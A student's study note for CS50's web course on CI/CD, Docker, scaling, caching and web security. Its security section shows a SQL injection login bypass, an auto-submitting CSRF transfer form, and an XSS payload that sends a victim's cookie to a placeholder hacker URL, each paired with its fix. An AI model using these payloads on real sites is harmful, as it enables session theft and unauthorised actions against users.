Jen-Hsuan Hsieh (Sean)

Summary

The article provides an overview of advanced web programming concepts including CI/CD, containerization, scalability, caching, and security, as part of the CS50 web programming course.

Abstract

This comprehensive article serves as a concluding note for CS50's web programming with Python and JavaScript, focusing on essential concepts beyond coding. It covers the introduction to CI/CD systems, emphasizing the roles of continuous integration and continuous delivery, and the advantages of using such systems. The article delves into containerization with Docker, comparing it to virtual machines, and explains Dockerfile usage and Docker-compose for managing containerized applications. Scalability concerns are addressed, including horizontal scaling and load balancing strategies. The importance of caching, both client-side and server-side, is discussed, with references to further reading on browser rendering. Security is a significant focus, detailing the use of HTTPS, environment variables, and API design considerations to prevent common vulnerabilities such as SQL injection, XSS, CSRF, and DDoS attacks. The author, Sean, shares his insights as a software engineer, invites feedback, and provides links to related topics and his social media for further engagement.

Opinions

  • The author believes that understanding CI/CD systems is crucial for reproducibility, tidy deployment, fast deployment, and automation of various development tasks.
  • There is a clear preference for Docker over traditional virtual machines due to its efficient use of resources and ease of management.
  • The author emphasizes the importance of scalability planning, particularly the benefits and challenges of horizontal scaling and the use of load balancers.
  • Caching is highlighted as a critical component for web performance, with the author suggesting specific HTTP headers for client-side caching and advocating for server-side caching solutions.
  • Security is not just a feature but a fundamental aspect of web development, with the author providing practical advice on using HTTPS, protecting sensitive information with environment variables, and implementing rate limiting and route authentication in APIs.
  • The author conveys the significance of being aware of and protecting against common security vulnerabilities, offering examples and solutions for each.
  • Sean encourages continuous learning and sharing of knowledge, as evidenced by the numerous references to his other articles and the invitation for readers to engage with him on social media.

CS50’s Web Programming with Python and JavaScript 2020 — CI/CD, Containerization, Scalability, Caching, and Security

Introduction

This is the last note for CS50's web programming course. The following sections don't contain much code, but I think it is helpful for beginners to know these basic concepts.

About this Series

This series aims to wrap up the contents of CS50’s Web Programming with Python and JavaScript.

Introduction to CI/CD systems

The tasks of Continuous Integration (CI)

1. Frequent merges to the main branch

2. Automated unit testing

The tasks of Continuous Delivery (CD)

1. CD builds on CI: once changes pass the automated tests, they are ready to deploy

2. Automated deployments

Why use a CI/CD system?

A CI/CD system has several advantages.

1. Reproducibility

  • Everyone has the same, predictable environment

2. Tidy deployment

  • Tests run in an environment that matches your production environment

3. Fast deployment

  • More confidence in code and pull requests

4. Automate all the things: code coverage, linting, language runtimes, dependency management, config management

Travis CI

Travis CI is a leading continuous integration platform. It started in 2011 as a service for open source projects and later added paid and enterprise plans.

Travis CI is GitHub-based. GitHub notifies Travis CI when a developer pushes code. Travis CI then pulls the code from GitHub and runs the tests automatically.

source: https://travis-ci.com

The steps to use Travis CI

1. Log in to Travis CI

2. Add .travis.yml

language: python
python:
    - 3.6
install:
    - pip install -r requirements.txt
script:
    - python manage.py test
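
The script step above runs the project's test suite on every push. As a rough sketch of what such an automated unit test might look like, the example below uses Python's built-in unittest module. The function is_valid_username and its rules are hypothetical, made up only for illustration.

```python
import unittest


def is_valid_username(username: str) -> bool:
    """Hypothetical rule: 3 to 20 characters, letters and digits only."""
    return 3 <= len(username) <= 20 and username.isalnum()


class UsernameTests(unittest.TestCase):
    """Each method is one automated check that CI would run on every push."""

    def test_accepts_simple_name(self):
        self.assertTrue(is_valid_username("alice"))

    def test_rejects_short_name(self):
        self.assertFalse(is_valid_username("al"))

    def test_rejects_symbols(self):
        self.assertFalse(is_valid_username("alice!"))
```

If any assertion fails, the test command exits with an error and the CI service marks the build as failed.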

Introduction to containerization

Comparing Docker and virtual machines

  • Virtual machine: each virtual machine runs its own guest operating system on top of the host
  • Docker: containers run directly on top of the host operating system. Docker only adds a layer that keeps the containers isolated from each other
source: https://www.docker.com/resources/what-container

Dockerfile

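1. Create a Dockerfile

# Start from the official Python 3 image
FROM python:3
# Run the following instructions from this directory inside the image
WORKDIR /usr/src/app
# Copy the dependency list first and install the dependencies
ADD requirements.txt /usr/src/app
RUN pip install -r requirements.txt
# Copy the rest of the project into the image
ADD . /usr/src/app

2. Run the command to build a Docker image

docker build .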

Docker-compose

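1. Create docker-compose.yml

- build: build the Docker image from the Dockerfile in the given directory (here, the current directory)

- command: the command to run when the container starts

- volumes: link the current directory to a directory inside the container

- ports: map a port on the host machine to a port inside the container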

version: '3'
services:
    db:
        image: postgres
    migration:
        build: .
        command: python3 manage.py migrate
        volumes:
            - .:/usr/src/app
        depends_on:
            - db
    web:
        build: .
        command: python3 manage.py runserver 0.0.0.0:8000
        volumes:
            - .:/usr/src/app
        ports:
            - "8000:8000"
        depends_on:
            - db
            - migration

2. Run the command to start the services

docker-compose up

Docker container

1. Run the following command to list the running containers

docker ps

2. Open a shell inside the Docker container

docker exec -it <container id> bash -l

Scalability

Developers have to plan for the moment their service becomes popular. There are a few questions to consider.

1. How do we measure how much work a server can do in a given amount of time?

  • Benchmarking
  • Figuring out the maximum capacity, that is, how much load the server can actually handle
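
To make the idea of benchmarking concrete, here is a minimal sketch that counts how many times a handler can run per second. The handle_request function is a hypothetical stand-in for real server work. A real benchmark would send HTTP requests to a running server with a load testing tool, so treat this only as an illustration of the measurement itself.

```python
import time


def handle_request(n: int) -> int:
    """Hypothetical request handler: stands in for real server work."""
    return sum(i * i for i in range(n))


def benchmark(handler, arg, duration_seconds: float = 0.2) -> float:
    """Call handler repeatedly for a fixed time and return calls per second."""
    count = 0
    start = time.perf_counter()
    while time.perf_counter() - start < duration_seconds:
        handler(arg)
        count += 1
    elapsed = time.perf_counter() - start
    return count / elapsed


if __name__ == "__main__":
    print(f"{benchmark(handle_request, 1000):.0f} requests per second")
```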

2. How do we deal with a large number of requests when the service becomes popular?

  1. Vertical scaling: add more resources to the server. Sooner or later this hits a limit, because a single machine can only grow so large
  2. Horizontal scaling: add more server instances. We then have to consider database race conditions and add a load balancer

3. The concerns of horizontal scaling (load balancing)

  • Every new piece of hardware, such as a load balancer, adds some time cost to each request

Horizontal scaling (Load balancing)

How does the load balancer decide where to send a user?

  1. Random choice: the user's session may be lost if a second visit lands on a different server
  2. Round-robin: send each new request to the next server in turn
  3. Fewest connections: send the request to the server with the fewest active connections
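
The three strategies above can be sketched in a few lines of Python. The server names and connection counts are hypothetical. A real load balancer tracks live connections itself, so this is only a sketch of the selection logic.

```python
import itertools
import random

SERVERS = ["server-a", "server-b", "server-c"]  # hypothetical server names


def random_choice(servers):
    """Pick any server with equal probability."""
    return random.choice(servers)


def make_round_robin(servers):
    """Return a function that cycles through the servers in order."""
    cycle = itertools.cycle(servers)
    return lambda: next(cycle)


def fewest_connections(active):
    """Pick the server that currently has the fewest open connections."""
    return min(active, key=active.get)


next_server = make_round_robin(SERVERS)
print([next_server() for _ in range(4)])
print(fewest_connections({"server-a": 12, "server-b": 3, "server-c": 7}))
```

Round-robin wraps around to the first server after the last one, and the fewest-connections call picks server-b because it has the smallest count.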

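Session-aware load balancing: make sure the user's session is available no matter how requests are routed

  1. Sticky sessions: always send the same user to the same server
  2. Sessions in the database: every server can read the session, but we also have to scale the database
  3. Client-side sessions: store the session in cookies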
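
One possible way to implement sticky sessions is to hash a client identifier, so that the same client always maps to the same server. The sketch below assumes the identifier is something like a session cookie value. The server names and the sticky_server function are hypothetical.

```python
import hashlib

SERVERS = ["server-a", "server-b", "server-c"]  # hypothetical server names


def sticky_server(client_id: str, servers=SERVERS) -> str:
    """Map a client identifier (for example a session cookie) to one server."""
    # Use a stable hash: Python's built-in hash() for strings changes per process.
    digest = hashlib.sha256(client_id.encode("utf-8")).digest()
    index = int.from_bytes(digest[:8], "big") % len(servers)
    return servers[index]


print(sticky_server("session-123") == sticky_server("session-123"))
```

A drawback of this simple modulo scheme is that adding or removing a server changes the mapping for many clients.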

Scaling database

Database partitioning

  1. Vertical database partitioning: split a table into multiple tables with fewer columns, and relate the tables with foreign keys
  2. Horizontal database partitioning: split the rows of a table into different tables, or store them on different servers
Database replication

1. Single-primary replication

  • We can only write to the primary database, which then updates the other databases. The drawback is that a single primary struggles with frequent write operations.

2. Multi-primary replication

  • We can write to any of the databases, and each database propagates its changes to the others. The drawback is that changes can conflict with each other.

Caching

Client-side caching

  • Cache-Control: max-age=86400
  • ETag: "3232444234325355768679"
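
Cache-Control: max-age=86400 tells the browser it may reuse its copy for 86400 seconds (one day). The ETag lets the browser ask whether its copy is still current by sending the value back in the If-None-Match request header. The sketch below shows how a server might use both headers. The functions make_etag and respond are hypothetical and not tied to any framework.

```python
import hashlib


def make_etag(body: bytes) -> str:
    """Derive an ETag from the response body; any stable fingerprint works."""
    return '"' + hashlib.sha256(body).hexdigest()[:16] + '"'


def respond(body: bytes, if_none_match=None):
    """Return (status, headers, body) for a cacheable resource."""
    etag = make_etag(body)
    headers = {"Cache-Control": "max-age=86400", "ETag": etag}
    if if_none_match == etag:
        # The browser's cached copy is still valid: send no body.
        return 304, headers, b""
    return 200, headers, body


status, headers, _ = respond(b"<h1>Hello</h1>")
print(status, headers["ETag"])
print(respond(b"<h1>Hello</h1>", if_none_match=headers["ETag"])[0])
```

The first call returns the full page with status 200. The second call, which carries the matching ETag, returns status 304 with an empty body.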

Server-side caching

  • An external cache can offer more space than a single server's local memory.
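
The basic idea of server-side caching is to store the result of expensive work and reuse it until it expires. The in-process TTLCache class below is a hypothetical sketch of that idea. An external cache service, for example Memcached or Redis, would play the same role but be shared by all servers.

```python
import time


class TTLCache:
    """In-process cache whose entries expire after ttl_seconds."""

    def __init__(self, ttl_seconds: float):
        self.ttl_seconds = ttl_seconds
        self._store = {}  # key -> (value, time it was stored)

    def get(self, key, compute):
        """Return the cached value, or call compute() and cache its result."""
        entry = self._store.get(key)
        now = time.monotonic()
        if entry is not None and now - entry[1] < self.ttl_seconds:
            return entry[0]
        value = compute()
        self._store[key] = (value, now)
        return value


cache = TTLCache(ttl_seconds=60)
page = cache.get("/home", lambda: "<h1>rendered home page</h1>")
print(page)
```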

I have also studied something related to the HTTP cache. Feel free to refer to the following article.

Security

Use HTTPS (Public-key cryptography)

There are two keys, each with its own role.

1. Public key

  • It can be shared with everyone
  • It is only used to encrypt information: it takes plain text and produces ciphertext

2. Private key

  • It must be kept to yourself. You should never share it with anyone.
  • It is used to decrypt the data
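
To see the two roles in action, here is a toy RSA example with deliberately tiny numbers. It only illustrates the idea that the public key encrypts and the private key decrypts. It is not secure, and the primes and exponent are textbook values chosen for this sketch.

```python
# Toy RSA with tiny primes; real keys use primes hundreds of digits long.
p, q = 61, 53
n = p * q                 # modulus, part of both keys
phi = (p - 1) * (q - 1)
e = 17                    # public exponent
d = pow(e, -1, phi)       # private exponent (requires Python 3.8+)


def encrypt(message: int) -> int:
    """Anyone holding the public key (n, e) can encrypt."""
    return pow(message, e, n)


def decrypt(ciphertext: int) -> int:
    """Only the holder of the private key (n, d) can decrypt."""
    return pow(ciphertext, d, n)


ciphertext = encrypt(65)
print(ciphertext, decrypt(ciphertext))
```

Decrypting the ciphertext returns the original message 65, while someone who only knows n and e cannot easily recover it when the primes are large.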

I have also studied topics related to HTTPS. Feel free to refer to the following article.

Use environment variables

  • Keep private information such as secret keys out of the public repository by reading it from environment variables. The following example shows how to use an environment variable in Flask.
app.config["SECRET_KEY"] = os.environ.get("SECRET_KEY")
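
Note that os.environ.get returns None when the variable is not set, so the application could start without a secret key. One way to guard against this is a small helper that fails early. The name require_env is hypothetical, and the sketch is independent of Flask.

```python
import os


def require_env(name: str) -> str:
    """Return the value of an environment variable or fail with a clear error."""
    value = os.environ.get(name)
    if not value:
        raise RuntimeError(f"Environment variable {name} is not set")
    return value


# Set here only for the demo; normally the shell or the host provides it.
os.environ["DEMO_SECRET_KEY"] = "not-a-real-secret"
print(require_env("DEMO_SECRET_KEY"))
```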

Design APIs with API keys

  • Rate limiting: limit how many requests each key can make
  • Route authentication: require a valid key to access certain routes
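
As a sketch of rate limiting, the class below allows each API key a fixed number of requests within a sliding time window. The class name, the parameters, and the in-memory storage are all assumptions made for illustration. With several servers, the counters would need to live in a shared store.

```python
import time
from collections import defaultdict, deque


class RateLimiter:
    """Allow at most max_requests per window_seconds for each API key."""

    def __init__(self, max_requests: int, window_seconds: float):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._history = defaultdict(deque)  # api_key -> recent request times

    def allow(self, api_key: str, now=None) -> bool:
        """Record the request and return True if the key is under its limit."""
        now = time.monotonic() if now is None else now
        recent = self._history[api_key]
        # Drop timestamps that have fallen out of the window.
        while recent and now - recent[0] >= self.window_seconds:
            recent.popleft()
        if len(recent) >= self.max_requests:
            return False
        recent.append(now)
        return True


limiter = RateLimiter(max_requests=2, window_seconds=60)
print([limiter.allow("demo-key") for _ in range(3)])
```

The third request from the same key within the window is rejected, and a web API would typically answer it with HTTP status 429 (Too Many Requests).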

Potential vulnerabilities

SQL injection

  • Suppose the application builds a SQL query by concatenating user input
select * from users
    where (username = '" + username + "')
    and (password = '" + password + "');
  • We expect input that produces a query like the following
select * from users
    where (username = 'alice')
    and (password = 'hello');
  • If someone enters 1' or '1' = '1 as the password, the condition is always true, and the attacker logs in without knowing the password
select * from users
    where (username = 'alice')
    and (password = '1' or '1' = '1');
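
The usual defense is to pass user input as query parameters instead of concatenating it into the SQL string. The sketch below reproduces the attack and the fix with Python's built-in sqlite3 module and an in-memory database. The table and the two login functions are hypothetical, and the plain-text password only mirrors the example above (real applications store password hashes).

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hello')")


def login_unsafe(username, password):
    """Vulnerable: builds the query by string concatenation."""
    query = ("SELECT * FROM users WHERE (username = '" + username + "') "
             "AND (password = '" + password + "')")
    return conn.execute(query).fetchone() is not None


def login_safe(username, password):
    """Placeholders make the driver treat the input as data, not as SQL."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


attack = "1' OR '1' = '1"
print(login_unsafe("alice", attack))  # True: the attack succeeds
print(login_safe("alice", attack))    # False: the input is compared literally
```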

Cross-Site Scripting (XSS)

  • An attacker injects JavaScript, or any other code the browser will run, into a page served by our site. For example, suppose we have a handler for 404 errors
from flask import Flask, request
app = Flask(__name__)
@app.errorhandler(404)
def page_not_found(e):
    return "Not found" + request.path
  • If a victim opens a URL with the following request path, the injected script sends the victim's cookie to the hacker's website. Some browsers, like Chrome, detect this kind of error and block it (ERR_BLOCKED_BY_XSS_AUDITOR).
/<script>document.write('<img src="hacker_url?cookie=' + document.cookie + '">')</script>
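  • Solution: render user input through Jinja2 templates, which escape HTML automatically in Flask. Do not apply the safe filter to user-supplied content, because safe turns escaping off
{% for message in messages %}
    <li>{{ message.contents }}</li>
{% endfor %}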
Cross-Site Request Forgery (CSRF)

  • An attacker forges a request to another website on the user's behalf. For example, the following page submits a hidden form as soon as it loads.
<body onload="document.forms[0].submit()">
    <form action="https://yourbank.com/transfer" method="post">
        <input type="hidden" name="to" value="brian"/>
        <input type="hidden" name="amt" value="2000"/>
        <input type="submit" value="click here"/>
    </form>
</body>
  • Solution: Django provides a CSRF token. The server rejects any form submission that does not carry the token it issued
<form action="/transfer" method="post">
    {% csrf_token %}
    <input name="to" value="brian"/>
    <input name="amt" value="2000"/>
    <input type="submit" value="click here"/>
</form>
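
The general idea behind a CSRF token can be sketched as follows: the server stores a random token in the user's session, embeds it in the form, and rejects any submission whose token does not match. This is a simplified illustration and not Django's actual implementation. The function names and the plain dict used as a session are assumptions.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Store a random token in the user's session and return it for the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_valid_csrf(session: dict, submitted) -> bool:
    """Accept the request only if the submitted token matches the session's."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # compare_digest avoids leaking information through timing differences.
    return hmac.compare_digest(expected.encode(), submitted.encode())


session = {}
token = issue_csrf_token(session)
print(is_valid_csrf(session, token), is_valid_csrf(session, "forged"))
```

A forged page on another site cannot read the token from the user's session, so its hidden form fails the check.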

DDoS attacks

  • Limit how many requests each client can make
  • Defend at both the server level and the ISP level

Summary

Thanks for your patience. I am Sean, and I work as a software engineer.

This article is my own study note. Please feel free to point out any mistakes. I look forward to your feedback.

Please feel free to clap if this article helped you. Thank you.

You can also subscribe to my page on Facebook.
